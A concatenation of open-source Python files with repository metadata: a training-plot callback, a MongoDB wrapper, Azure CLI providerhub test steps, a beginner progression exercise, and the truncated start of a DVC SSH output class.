            # mean probability of the true class.
            for i, c in enumerate(self._classes):
                self.graph_ax.scatter(y_pred[y_true == c], y_true[y_true == c] + self._rand[i], color=self._color[i],
                                      edgecolor='black', alpha=self.alpha, linewidth=.5, s=self.size)
                self.graph_ax.vlines(np.mean(y_pred[y_true == c]), i - .5, i + .5, color='r')
            self.graph_ax.vlines(.5, min(self._h_vals), max(self._h_vals), linewidth=.5)
            self.graph_ax.hlines(self._h_vals, 0, 1, linewidth=.5)
            self.graph_ax.set_xlim(0, 1)
            self.graph_ax.set_ylim(min(self._h_vals), max(self._h_vals))
            self.graph_ax.set_xticks(np.linspace(0, 1, 11))
            self.graph_ax.set_yticks(self._classes)
            self.graph_ax.set_yticklabels(self._cl_names)
            self.graph_ax.set_xlabel('probability of true class', fontsize=12)
            self.graph_ax.set_ylabel('true class', fontsize=12)
            self.graph_ax.grid(axis='x', color='gainsboro', linewidth=.2)
        else:
            # Regression: y_pred vs y_true with the identity line as guide.
            self.graph_ax.scatter(y_pred, y_true, lw=1, color=self.color,
                                  edgecolor='black', alpha=self.alpha, linewidth=.5, s=self.size)
            self.graph_ax.set_xlim(*x_bounds)
            self.graph_ax.set_ylim(*y_bounds)
            self.graph_ax.plot([*x_bounds], [*x_bounds], color='gainsboro')
            self.graph_ax.set_xlabel('y_pred', fontsize=12)
            self.graph_ax.set_ylabel('y_true', fontsize=12)
            self.graph_ax.grid(color='gainsboro', linewidth=.2)
        self.graph_ax.set_title(f'Prediction Dynamics \nepoch: {self.epoch +1}/{self.n_epoch}')
        # Refresh the in-place metric table and the chart output cells.
        self.df_out.update(pd.DataFrame(np.stack(self.learn.recorder.values)[-1].reshape(1,-1),
                                        columns=self.learn.recorder.metric_names[1:-1], index=[self.epoch]))
        self.graph_out.update(self.graph_ax.figure)
ace06b15f5e14cbab05bf6657172bae626e96694 | 998 | py | Python | database.py | napsterstiffler/faceoff | af0c92e3803e74bfd5922ac980457728427d2605 | [
"MIT"
] | null | null | null | database.py | napsterstiffler/faceoff | af0c92e3803e74bfd5922ac980457728427d2605 | [
"MIT"
] | null | null | null | database.py | napsterstiffler/faceoff | af0c92e3803e74bfd5922ac980457728427d2605 | [
"MIT"
] | null | null | null | from pymongo import MongoClient
import yaml
class Database:
    """Thin wrapper around the "faceoff" MongoDB database on mLab."""

    def __init__(self):
        with open('conf/pass.yml', 'r') as f:
            # yaml.load without an explicit Loader can construct arbitrary
            # Python objects from the file (unsafe) and raises TypeError on
            # PyYAML >= 6; safe_load parses plain data only.
            conf = yaml.safe_load(f)
        uri = conf['mlab']['uri']
        self.MONGODB_URI = uri
        self.client = MongoClient(self.MONGODB_URI, connectTimeoutMS=30000)
        self.db = self.client.get_database("faceoff")
        self.face = self.db.faces

    def getAll(self):
        """Return a cursor over every stored face record."""
        records = self.face.find({})
        return records

    def pushRECORD(self, record):
        """Insert one face record."""
        self.face.insert_one(record)

    def pushEntryLog(self, log):
        """Insert one entry-log document."""
        self.db.entrylog.insert_one(log)

    def pushdatelog(self, d):
        """Insert one per-date log document."""
        self.db.entrylog.insert_one(d)

    def getlogbydate(self, d):
        """Return the entry-log document whose _id is the given date."""
        return self.db.entrylog.find_one({'_id': d})

    def updatelog(self, id, data, name):
        """Replace the 'logs' field of the document with _id == id,
        creating the document if it does not exist (upsert)."""
        self.db.entrylog.update_one({'_id': id}, {'$set': {'logs': data}}, upsert=True)
        print(name+' updated')
db = Database()
| 25.589744 | 89 | 0.58517 |
ace06ccfff334149c4411f37d3d45640186bddb4 | 25,325 | py | Python | src/providerhub/azext_providerhub/tests/latest/example_steps.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/providerhub/azext_providerhub/tests/latest/example_steps.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/providerhub/azext_providerhub/tests/latest/example_steps.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.cli.testsdk import (live_only)
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
from .. import try_manual
# EXAMPLE: /CustomRollouts/put/CustomRollouts_CreateOrUpdate
@try_manual
def step_custom_rollout_create(test, checks=None):
    """Create a custom rollout (CustomRollouts_CreateOrUpdate example)."""
    if checks is None:
        checks = []
    # BUG FIX: previously passed the literal ``checks=[]``, silently
    # discarding any checks supplied by the caller; every sibling step
    # forwards the normalized ``checks`` variable.
    test.cmd('az providerhub custom-rollout create '
             '--provider-namespace "{providerNamespace}" '
             '--rollout-name "{customRolloutName}" '
             '--canary regions="EastUS2EUAP" regions="centraluseuap"',
             checks=checks)
# EXAMPLE: /CustomRollouts/get/CustomRollouts_Get
@try_manual
def step_custom_rollout_show(test, checks=None):
    """Show a single custom rollout and validate it (CustomRollouts_Get)."""
    checks = [] if checks is None else checks
    command = ('az providerhub custom-rollout show '
               '--provider-namespace "{providerNamespace}" '
               '--rollout-name "{customRolloutName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /CustomRollouts/get/CustomRollouts_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_custom_rollout_list(test, checks=None):
    """List all custom rollouts under the provider registration."""
    checks = [] if checks is None else checks
    command = ('az providerhub custom-rollout list '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /DefaultRollouts/put/DefaultRollouts_CreateOrUpdate
# NOTE(review): unlike its siblings this step is @live_only and not wrapped in
# @try_manual — presumably intentional (cannot be recorded); confirm.
@AllowLargeResponse()
@live_only()
def step_default_rollout_create(test, checks=None):
    """Create or update the default rollout (DefaultRollouts_CreateOrUpdate)."""
    if checks is None:
        checks = []
    test.cmd('az providerhub default-rollout create '
             '--provider-namespace "{providerNamespace}" '
             '--rollout-name "{defaultRolloutName}" '
             '--rest-of-the-world-group-two wait-duration="PT2H" '
             '--canary skip-regions="centraluseuap"',
             checks=checks)
# EXAMPLE: /DefaultRollouts/get/DefaultRollouts_Get
@AllowLargeResponse()
@try_manual
def step_default_rollout_show(test, checks=None):
    """Show the named default rollout (DefaultRollouts_Get)."""
    checks = [] if checks is None else checks
    command = ('az providerhub default-rollout show '
               '--provider-namespace "{providerNamespace}" '
               '--rollout-name "{defaultRolloutName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /DefaultRollouts/get/DefaultRollouts_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_default_rollout_list(test, checks=None):
    """List default rollouts under the provider registration."""
    checks = [] if checks is None else checks
    command = ('az providerhub default-rollout list '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /DefaultRollouts/post/DefaultRollouts_Stop
@try_manual
def step_default_rollout_stop(test, checks=None):
    """Stop an in-progress default rollout (DefaultRollouts_Stop)."""
    checks = [] if checks is None else checks
    command = ('az providerhub default-rollout stop '
               '--provider-namespace "{providerNamespace}" '
               '--rollout-name "{defaultRolloutName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /DefaultRollouts/delete/DefaultRollouts_Delete
@try_manual
def step_default_rollout_delete(test, checks=None):
    """Delete the default rollout without prompting (DefaultRollouts_Delete)."""
    checks = [] if checks is None else checks
    command = ('az providerhub default-rollout delete -y '
               '--provider-namespace "{providerNamespace}" '
               '--rollout-name "{defaultRolloutName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Operations/put/Operations_CreateOrUpdate
@try_manual
def step_operation_create(test, checks=None):
    """Create/update the provider's operations document (Operations_CreateOrUpdate).

    The ``{{``/``\\"`` doubling presumably survives the scenario-test kwarg
    substitution and yields a JSON array literal on the CLI command line.
    """
    if checks is None:
        checks = []
    test.cmd('az providerhub operation create '
             '--contents "[{{\\"name\\":\\"Microsoft.Contoso/Employees/Read\\",\\"display\\":{{\\"description\\":\\"Rea'
             'd employees\\",\\"operation\\":\\"Gets/List employee resources\\",\\"provider\\":\\"Microsoft.Contoso\\",'
             '\\"resource\\":\\"Employees\\"}}}}]" '
             '--provider-namespace "{providerNamespace}"',
             checks=checks)
# EXAMPLE: /Operations/get/Operations_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_operation_list(test, checks=None):
    """List operations registered under the provider namespace."""
    checks = [] if checks is None else checks
    command = ('az providerhub operation list '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Operations/delete/Operations_Delete
@try_manual
def step_operation_delete(test, checks=None):
    """Delete the provider's operations document without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub operation delete -y '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /providerhub/post/CheckinManifest
@try_manual
def step_manifest_checkin(test, checks=None):
    """Check in the provider manifest for the Prod environment."""
    checks = [] if checks is None else checks
    command = ('az providerhub manifest checkin '
               '--environment "Prod" '
               '--baseline-arm-manifest-location "EastUS2EUAP" '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /providerhub/post/GenerateManifest
@AllowLargeResponse()
@try_manual
def step_manifest_generate(test, checks=None):
    """Generate the provider manifest for the namespace."""
    checks = [] if checks is None else checks
    command = ('az providerhub manifest generate '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /ProviderRegistrations/put/ProviderRegistrations_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_provider_registration_create(test, checks=None):
    """Create or update the provider registration with full metadata
    (authorizations, authentication, service-tree, capabilities, incident
    routing) — ProviderRegistrations_CreateOrUpdate."""
    if checks is None:
        checks = []
    test.cmd('az providerhub provider-registration create '
             '--providerhub-metadata-authorizations application-id="3d834152-5efa-46f7-85a4-a18c2b5d46f9" '
             'role-definition-id="760505bf-dcfa-4311-b890-18da392a00b2" '
             '--providerhub-metadata-authentication allowed-audiences="https://management.core.windows.net/" '
             '--service-tree-infos service-id="6f53185c-ea09-4fc3-9075-318dec805303" '
             'component-id="6f53185c-ea09-4fc3-9075-318dec805303" '
             '--capabilities effect="Allow" quota-id="CSP_2015-05-01" '
             '--capabilities effect="Allow" quota-id="CSP_MG_2017-12-01" '
             '--manifest-owners "SPARTA-PlatformServiceAdministrator" '
             '--incident-contact-email "helpme@contoso.com" '
             '--incident-routing-service "Contoso Resource Provider" '
             '--incident-routing-team "Contoso Triage" '
             '--provider-type "Internal, Hidden" '
             '--provider-version "2.0" '
             '--provider-namespace "{providerNamespace}"',
             checks=checks)
# EXAMPLE: /ProviderRegistrations/get/ProviderRegistrations_Get
@AllowLargeResponse()
@try_manual
def step_provider_registration_show(test, checks=None):
    """Show the provider registration (ProviderRegistrations_Get)."""
    checks = [] if checks is None else checks
    command = ('az providerhub provider-registration show '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /ProviderRegistrations/get/ProviderRegistrations_List
@AllowLargeResponse()
@try_manual
def step_provider_registration_list(test, checks=None):
    """List every provider registration visible to the subscription."""
    checks = [] if checks is None else checks
    test.cmd('az providerhub provider-registration list', checks=checks)
# EXAMPLE: /ProviderRegistrations/post/ProviderRegistrations_GenerateOperations
@AllowLargeResponse()
@try_manual
def step_provider_registration_generate_operation(test, checks=None):
    """Generate the operations document for the provider registration."""
    checks = [] if checks is None else checks
    command = ('az providerhub provider-registration generate-operation '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /ProviderRegistrations/delete/ProviderRegistrations_Delete
@try_manual
def step_provider_registration_delete(test, checks=None):
    """Delete the provider registration without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub provider-registration delete -y '
               '--provider-namespace "{providerNamespace}" ')
    test.cmd(command, checks=checks)
# EXAMPLE: /ResourceTypeRegistration/put/ResourceTypeRegistration_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_resource_type_registration_create(test, checks=None):
    """Register the top-level "extensionresourcetype" resource type
    (ResourceTypeRegistration_CreateOrUpdate)."""
    if checks is None:
        checks = []
    test.cmd('az providerhub resource-type-registration create '
             '--endpoints api-versions="2020-01-01-preview" '
             'locations="" required-features="Microsoft.Contoso/RPaaSSampleApp" '
             '--regionality "Global" '
             '--routing-type "Proxyonly, Extension" '
             '--swagger-specifications api-versions="2020-01-01-preview" swagger-spec-folder-uri="https://github.com/Azure/azure-rest-api-specs-pr/blob/RPSaaSMaster/specification/contoso/resource-manager/Microsoft.Contoso/" '
             '--provider-namespace "{providerNamespace}" '
             '--enable-async-operation false '
             '--enable-third-party-s2s false '
             '--resource-type "extensionresourcetype"',
             checks=checks)
# EXAMPLE: /ResourceTypeRegistrations/get/ResourceTypeRegistrations_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_resource_type_registration_list(test, checks=None):
    """List resource-type registrations under the provider registration."""
    checks = [] if checks is None else checks
    command = ('az providerhub resource-type-registration list '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /ResourceTypeRegistrations/get/ResourceTypeRegistrations_Get
@AllowLargeResponse()
@try_manual
def step_resource_type_registration_show(test, checks=None):
    """Show the "employees" resource-type registration."""
    checks = [] if checks is None else checks
    command = ('az providerhub resource-type-registration show '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "employees"')
    test.cmd(command, checks=checks)
# EXAMPLE: /ResourceTypeRegistration/put/ResourceTypeRegistration_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_nested_resource_type_registration_create(test, checks=None):
    """Register a nested resource type using the flat extension-endpoint
    parameters; default checks validate name/routing/regionality."""
    if checks is None:
        checks = [
            test.check("properties.name", "employees/NestedResourceType", case_sensitive=False),
            test.check("properties.routingType", "ProxyOnly", case_sensitive=False),
            test.check("properties.regionality", "Global", case_sensitive=False)
        ]
    test.cmd('az providerhub resource-type-registration create '
             '--endpoints api-versions="2019-01-01" locations="Global" '
             'required-features="Microsoft.Contoso/RPaaSSampleApp" extension-endpoint-uri="https://contoso-test-extension-endpoint.com/" extension-categories="ResourceReadValidate" extension-categories="ResourceDeletionValidate" '
             '--regionality "Global" '
             '--routing-type "ProxyOnly" '
             '--swagger-specifications api-versions="2019-01-01" swagger-spec-folder-uri="https://github.com/Azure/azure-rest-api-specs-pr/tree/RPSaaSMaster/specification/rpsaas/resource-manager/Microsoft.Contoso/" '
             '--provider-namespace "{providerNamespace}" '
             '--enable-async-operation false '
             '--template-deployment-options preflight-supported="true" preflight-options="DefaultValidationOnly" preflight-options="continueDeploymentOnFailure" '
             '--resource-type "{resourceType}/{nestedResourceType}"',
             checks=checks)
# EXAMPLE: /ResourceTypeRegistration/put/ResourceTypeRegistration_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_nested_resource_type_registration_extensions_create(test, checks=None):
    """Same nested registration as above, but supplying the endpoint via the
    inline ``extensions=[...]`` JSON form instead of the flat parameters."""
    if checks is None:
        checks = [
            test.check("properties.name", "employees/NestedResourceType", case_sensitive=False),
            test.check("properties.routingType", "ProxyOnly", case_sensitive=False),
            test.check("properties.regionality", "Global", case_sensitive=False)
        ]
    test.cmd('az providerhub resource-type-registration create '
             '--endpoints api-versions="2019-01-01" locations="Global" '
             'required-features="Microsoft.Contoso/RPaaSSampleApp" extensions=[{{\\"endpointUri\\":\\"https://contoso-test-extension-endpoint.com/\\",\\"extensionCategories\\":[\\"ResourceReadValidate\\",\\"ResourceDeletionValidate\\"]}}] '
             '--regionality "Global" '
             '--routing-type "ProxyOnly" '
             '--swagger-specifications api-versions="2019-01-01" swagger-spec-folder-uri="https://github.com/Azure/azure-rest-api-specs-pr/tree/RPSaaSMaster/specification/rpsaas/resource-manager/Microsoft.Contoso/" '
             '--provider-namespace "{providerNamespace}" '
             '--enable-async-operation false '
             '--template-deployment-options preflight-supported="true" preflight-options="DefaultValidationOnly" preflight-options="continueDeploymentOnFailure" '
             '--resource-type "{resourceType}/{nestedResourceType}"',
             checks=checks)
# EXAMPLE: /ResourceTypeRegistration/delete/ResourceTypeRegistration_Delete
@try_manual
def step_nested_resource_type_registration_delete(test, checks=None):
    """Delete the nested resource-type registration without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub resource-type-registration delete -y '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}/{nestedResourceType}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /ResourceTypeRegistrations/get/ResourceTypeRegistrations_Get
@AllowLargeResponse()
@try_manual
def step_nested_resource_type_registration_show(test, checks=None):
    """Show the nested resource-type registration."""
    checks = [] if checks is None else checks
    command = ('az providerhub resource-type-registration show '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}/{nestedResourceType}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /NotificationRegistrations/put/NotificationRegistrations_CreateOrUpdate
@try_manual
def step_notification_registration_create(test, checks=None):
    """Create/update an EventHub notification registration with two endpoint
    destinations; default checks validate name, scope and mode."""
    if checks is None:
        checks = [
            test.check("name", "{notificationRegistration}", case_sensitive=False),
            test.check("properties.messageScope", "RegisteredSubscriptions", case_sensitive=False),
            test.check("properties.notificationMode", "EventHub", case_sensitive=False)
        ]
    test.cmd('az providerhub notification-registration create '
             '--name "{notificationRegistration}" '
             '--included-events "*/write" "Microsoft.Contoso/employees/delete" '
             '--message-scope "RegisteredSubscriptions" '
             '--notification-endpoints locations="" locations="East US" notification-destination="/subscriptions/ac6bcfb5-3dc1-491f-95a6-646b89bf3e88/resourceGroups/mgmtexp-eastus/providers/Microsoft.EventHub/namespaces/unitedstates-mgmtexpint/eventhubs/armlinkednotifications" '
             '--notification-endpoints locations="East US" notification-destination="/subscriptions/{subscription_'
             'id}/resourceGroups/providers/Microsoft.EventHub/namespaces/europe-mgmtexpint/eventhubs/armlinkedno'
             'tifications" '
             '--notification-mode "EventHub" '
             '--provider-namespace "{providerNamespace}"',
             checks=checks)
# EXAMPLE: /NotificationRegistrations/get/NotificationRegistrations_Get
@try_manual
def step_notification_registration_show(test, checks=None):
    """Show one notification registration; default checks mirror the ones
    used at creation time (name, scope, mode)."""
    if checks is None:
        checks = [
            test.check("name", "{notificationRegistration}", case_sensitive=False),
            test.check("properties.messageScope", "RegisteredSubscriptions", case_sensitive=False),
            test.check("properties.notificationMode", "EventHub", case_sensitive=False),
        ]
    test.cmd('az providerhub notification-registration show '
             '--name "{notificationRegistration}" '
             '--provider-namespace "{providerNamespace}"',
             checks=checks)
# EXAMPLE: /NotificationRegistrations/get/NotificationRegistrations_ListByProviderRegistration
@try_manual
def step_notification_registration_list(test, checks=None):
    """List notification registrations; the default check expects exactly two."""
    if checks is None:
        checks = [test.check('length(@)', 2)]
    command = ('az providerhub notification-registration list '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /NotificationRegistrations/delete/NotificationRegistrations_Delete
@try_manual
def step_notification_registration_delete(test, checks=None):
    """Delete the named notification registration without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub notification-registration delete -y '
               '--name "{notificationRegistration}" '
               '--provider-namespace "{providerNamespace}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdate
@try_manual
def step_sku_create(test, checks=None):
    """Create a single free SKU on the top-level resource type."""
    if checks is None:
        checks = []
    test.cmd('az providerhub sku create '
             '--sku-settings "[{{\\"name\\":\\"freeSku\\"}}]" '
             '--provider-namespace "{providerNamespace}" '
             '--resource-type "{resourceType}" '
             '--sku "{skuName}"',
             checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdateNestedResourceTypeFirst
@try_manual
def step_sku_create2(test, checks=None):
    """Create free+premium SKUs one nesting level down."""
    if checks is None:
        checks = []
    test.cmd('az providerhub sku create '
             '--nested-resource-type-first "nestedResourceTypeFirst" '
             '--sku-settings "[{{\\"name\\":\\"freeSku\\",\\"kind\\":\\"Standard\\",\\"tier\\":\\"Tier1\\"}},{{\\"name'
             '\\":\\"premiumSku\\",\\"costs\\":[{{\\"meterId\\":\\"xxx\\"}}],\\"kind\\":\\"Premium\\",\\"tier\\":\\"Tie'
             'r2\\"}}]" '
             '--provider-namespace "{providerNamespace}" '
             '--resource-type "{resourceType}" '
             '--sku "{skuName}"',
             checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdateNestedResourceTypeSecond
@try_manual
def step_sku_create3(test, checks=None):
    """Create free+premium SKUs two nesting levels down."""
    if checks is None:
        checks = []
    test.cmd('az providerhub sku create '
             '--nested-resource-type-first "nestedResourceTypeFirst" '
             '--nested-resource-type-second "nestedResourceTypeSecond" '
             '--sku-settings "[{{\\"name\\":\\"freeSku\\",\\"kind\\":\\"Standard\\",\\"tier\\":\\"Tier1\\"}},{{\\"name'
             '\\":\\"premiumSku\\",\\"costs\\":[{{\\"meterId\\":\\"xxx\\"}}],\\"kind\\":\\"Premium\\",\\"tier\\":\\"Tie'
             'r2\\"}}]" '
             '--provider-namespace "{providerNamespace}" '
             '--resource-type "{resourceType}" '
             '--sku "{skuName}"',
             checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdateNestedResourceTypeThird
@try_manual
def step_sku_create4(test, checks=None):
    """Create free+premium SKUs three nesting levels down."""
    if checks is None:
        checks = []
    test.cmd('az providerhub sku create '
             '--nested-resource-type-first "nestedResourceTypeFirst" '
             '--nested-resource-type-second "nestedResourceTypeSecond" '
             '--nested-resource-type-third "nestedResourceTypeThird" '
             '--sku-settings "[{{\\"name\\":\\"freeSku\\",\\"kind\\":\\"Standard\\",\\"tier\\":\\"Tier1\\"}},{{\\"name'
             '\\":\\"premiumSku\\",\\"costs\\":[{{\\"meterId\\":\\"xxx\\"}}],\\"kind\\":\\"Premium\\",\\"tier\\":\\"Tie'
             'r2\\"}}]" '
             '--provider-namespace "{providerNamespace}" '
             '--resource-type "{resourceType}" '
             '--sku "{skuName}"',
             checks=checks)
# EXAMPLE: /Skus/get/Skus_Get
@try_manual
def step_sku_show(test, checks=None):
    """Show a SKU on the top-level resource type (Skus_Get)."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku show '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_GetNestedResourceTypeFirst
@try_manual
def step_sku_show_nested_resource_type_first(test, checks=None):
    """Show a SKU one nesting level down."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku show-nested-resource-type-first '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_GetNestedResourceTypeSecond
@try_manual
def step_sku_show_nested_resource_type_second(test, checks=None):
    """Show a SKU two nesting levels down."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku show-nested-resource-type-second '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--nested-resource-type-second "nestedResourceTypeSecond" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_GetNestedResourceTypeThird
@try_manual
def step_sku_show_nested_resource_type_third(test, checks=None):
    """Show a SKU three nesting levels down."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku show-nested-resource-type-third '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--nested-resource-type-second "nestedResourceTypeSecond" '
               '--nested-resource-type-third "nestedResourceTypeThird" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrations
@try_manual
def step_sku_list(test, checks=None):
    """List SKUs registered on the top-level resource type."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku list '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrationsNestedResourceTypeFirst
@try_manual
def step_sku_list2(test, checks=None):
    """List SKUs one nesting level down."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku list '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrationsNestedResourceTypeSecond
@try_manual
def step_sku_list3(test, checks=None):
    """List SKUs two nesting levels down."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku list '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--nested-resource-type-second "nestedResourceTypeSecond" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrationsNestedResourceTypeThird
@try_manual
def step_sku_list4(test, checks=None):
    """List SKUs three nesting levels down."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku list '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--nested-resource-type-second "nestedResourceTypeSecond" '
               '--nested-resource-type-third "nestedResourceTypeThird" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/delete/Skus_Delete
@try_manual
def step_sku_delete(test, checks=None):
    """Delete a top-level SKU without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku delete -y '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/delete/Skus_DeleteNestedResourceTypeFirst
@try_manual
def step_sku_delete2(test, checks=None):
    """Delete a SKU one nesting level down, without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku delete -y '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/delete/Skus_DeleteNestedResourceTypeSecond
@try_manual
def step_sku_delete3(test, checks=None):
    """Delete a SKU two nesting levels down, without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku delete -y '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--nested-resource-type-second "nestedResourceTypeSecond" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
# EXAMPLE: /Skus/delete/Skus_DeleteNestedResourceTypeThird
@try_manual
def step_sku_delete4(test, checks=None):
    """Delete a SKU three nesting levels down, without prompting."""
    checks = [] if checks is None else checks
    command = ('az providerhub sku delete -y '
               '--nested-resource-type-first "nestedResourceTypeFirst" '
               '--nested-resource-type-second "nestedResourceTypeSecond" '
               '--nested-resource-type-third "nestedResourceTypeThird" '
               '--provider-namespace "{providerNamespace}" '
               '--resource-type "{resourceType}" '
               '--sku "{skuName}"')
    test.cmd(command, checks=checks)
| 40.65008 | 279 | 0.649753 |
ace06cf53298b3719bf69ac7e005e7c6d62e2b2c | 244 | py | Python | PythonExercicios/Mundo 2/ex061.py | gabryelvicthor/Aprendendo-Python | 895c5ef2d93c946d1e61c1820b3d7e09669e59ca | [
"MIT"
] | null | null | null | PythonExercicios/Mundo 2/ex061.py | gabryelvicthor/Aprendendo-Python | 895c5ef2d93c946d1e61c1820b3d7e09669e59ca | [
"MIT"
] | null | null | null | PythonExercicios/Mundo 2/ex061.py | gabryelvicthor/Aprendendo-Python | 895c5ef2d93c946d1e61c1820b3d7e09669e59ca | [
"MIT"
] | null | null | null | print('-=' * 8)
print('Gerador de PA')
print('-=' * 8)
p = int(input('Digite o primeiro termo da PA: '))
r = int(input('Digite a razão da PA: '))
i = 0
while not i == 10:
print('{} > '.format(p), end= '')
p += r
i +=1
print('FIM')
| 18.769231 | 49 | 0.516393 |
ace06d2ec9b458657657836e185c6cc6ea4f58e4 | 1,326 | py | Python | dvc/output/ssh.py | vyloy/dvc | 60c89adeb5dcc293d8661d6aabeb1da6d05466f5 | [
"Apache-2.0"
] | 1 | 2019-04-16T19:51:03.000Z | 2019-04-16T19:51:03.000Z | dvc/output/ssh.py | vyloy/dvc | 60c89adeb5dcc293d8661d6aabeb1da6d05466f5 | [
"Apache-2.0"
] | null | null | null | dvc/output/ssh.py | vyloy/dvc | 60c89adeb5dcc293d8661d6aabeb1da6d05466f5 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
import getpass
import posixpath
from dvc.utils.compat import urlparse
from dvc.output.base import OutputBase
from dvc.remote.ssh import RemoteSSH
class OutputSSH(OutputBase):
REMOTE = RemoteSSH
def __init__(
self,
stage,
path,
info=None,
remote=None,
cache=True,
metric=False,
persist=False,
tags=None,
):
super(OutputSSH, self).__init__(
stage,
path,
info=info,
remote=remote,
cache=cache,
metric=metric,
persist=persist,
tags=tags,
)
parsed = urlparse(path)
host = remote.host if remote else parsed.hostname
port = (
remote.port if remote else (parsed.port or RemoteSSH.DEFAULT_PORT)
)
user = (
